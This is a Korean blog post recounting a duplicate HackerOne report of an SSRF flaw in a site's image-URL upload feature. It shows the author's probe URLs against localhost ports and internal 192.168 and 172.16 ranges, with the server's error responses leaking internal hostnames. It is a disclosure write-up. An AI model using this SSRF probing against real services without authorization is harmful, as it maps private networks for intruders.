💰Bug Bounty

[hackerone] - 너무 많이 늦은 버그 바운티 제보

Universe7202 2020. 8. 17. 23:29

 

 

 

 

Title

Internal Ports Scanning and IPs Scanning via SSRF

 

Weakness

SSRF

 

 

이번에 제보한 보고서는 SSRF 취약점 이다.

SSRF 공격으로 내부 IP 또는 Port를 스캔 할 수 있다.

 

해당 사이트는 이미지를 업로드 하거나, 이미지 URL를 입력하여 서버가 그 이미지를 가져오는 기능이 있다.

혹시나 하는 마음에 http://127.0.0.1 라고 입력했는데 아래와 같은 결과가 출력 되었다.

[127.0.0.1]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)

 

Error 내용을 보면 127.0.0.1에 요청을 보냈는데, 503 을 받았다....

즉, SSRF 공격이 가능하다는 뜻이다.

Port 스캔을 하기 위해 알려진 포트를 토대로 요청을 날렸지만, 결과는 그닥 도움은 되지 않았다.

>> https://127.0.0.1:0
{"data":{"error":{"code":1011,"message":"[127.0.0.1:0]: Invalid URL (https:\/\/127.0.0.1:0)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":400}
>> https://127.0.0.1:1
{"data":{"error":{"code":2011,"message":"[127.0.0.1:1]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:7
{"data":{"error":{"code":2011,"message":"[127.0.0.1:7]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://127.0.0.1:9
{"data":{"error":{"code":2011,"message":"[127.0.0.1:9]: Image could not be downloaded (curl error: 56; Received HTTP code 403 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...
...
>> https://127.0.0.1:443
{"data":{"error":{"code":2011,"message":"[127.0.0.1:443]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
...

 

 

Port 스캔은 포기하고 내부 IP들로만 입력하여 어떠한 결과를 출력하는지 봤다.

우선 `192.168.0.0/24` 대역을 쭉 요청 날려 봤는데, 위 내용과는 다른 `time out` 이 뜬다.

>> https://192.168.0.128
{"data":{"error":{"code":2011,"message":"[192.168.0.128]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.64
{"data":{"error":{"code":2011,"message":"[192.168.0.64]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.32
{"data":{"error":{"code":2011,"message":"[192.168.0.32]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.192
{"data":{"error":{"code":2011,"message":"[192.168.0.192]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}
>> https://192.168.0.1
{"data":{"error":{"code":2011,"message":"[192.168.0.1]: Image could not be downloaded (curl error: 56; Proxy CONNECT aborted due to timeout)","type":"Exception_UploadError","exception":{}},"request":"\/upload","method":"POST"},"success":false,"status":500}

 

 

`172.16.0.0/24` 대역으로 요청을 날렸는데, 도움이 될만한 정보가 출력이 되었다.

몇몇 내부 IP는 각각의 내부 도메인을 가지고 있었고, 도메인 이름이 출력 되는 것을 볼 수 있다.

>> https://172.16.0.163
[172.16.0.163]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'larynx.domain-name.com' does not match target host name '172.16.0.163')

>> https://172.16.0.131
[172.16.0.131]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.131')

>> https://172.16.0.132
[172.16.0.132]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.132')

>> https://172.16.0.135
[172.16.0.135]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.135')

>> https://172.16.0.102
[172.16.0.102]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.102')


>> https://172.16.0.8
[172.16.0.8]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.8')

>> https://172.16.0.12
[172.16.0.12]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'browserevents.domain-name.com' does not match target host name '172.16.0.12')

>> https://172.16.0.109
[172.16.0.109]: Image could not be downloaded (curl error: 56; Received HTTP code 503 from proxy after CONNECT)

>> https://172.16.0.45
[172.16.0.45]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.45')

>> https://172.16.0.176
[172.16.0.176]: Image could not be downloaded (curl error: 51; SSL: certificate subject name 'monitor.production.domain-name-ops.com' does not match target host name '172.16.0.176')

>> https://172.16.0.117
[172.16.0.117]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.117')

>> https://172.16.0.155
[172.16.0.155]: Image could not be downloaded (curl error: 28; Operation timed out after 0 milliseconds with 0 out of 0 bytes received)

>> https://172.16.0.158
[172.16.0.158]: Image could not be downloaded (curl error: 51; SSL: certificate subject name '*.domain-name.com' does not match target host name '172.16.0.158')

 

 

해당 사이트는 SSRF 공격에 취약하니, 내부 도메인을 적어 요청 보내면 어떤 결과를 얻을 수 있을까 생각했지만...

그 내부망의 이미지라도 보고 싶었는데,, 나오지는 않더라..

 

그래서 일단 SSRF 취약점이 존재하니 hackerone에 제보를 했고, BOT이 일단 나중에 연락할테니 기다리라고 한다.

 

 

 

근데 몇시간 뒤 누군가 코멘트를 달았는데, 읽어보니.... 이미 누군가 똑같은 취약점을 제보 했다라고...

 

 

이 코멘트 작성자는 나에게 리포트를 공유했고, 읽어보니 3년전에 누군가 벌써 제보를 했던 거였다.

웃긴건 나 외에 10명 이상 나와 같은 리포트를 제출했고, 댓글에는 "3년이 지났는데 왜 아직도 안고치고 있냐, 다른 사람들이 시간 낭비를 하고 있지 않느냐" 라는게 적혀있었다..

 

 

결론은 내가 제출한 리포트는 중복 처리 되었다.

 

암튼... real world 에서 이런 취약점을 발견한 것 만으로 만족하자...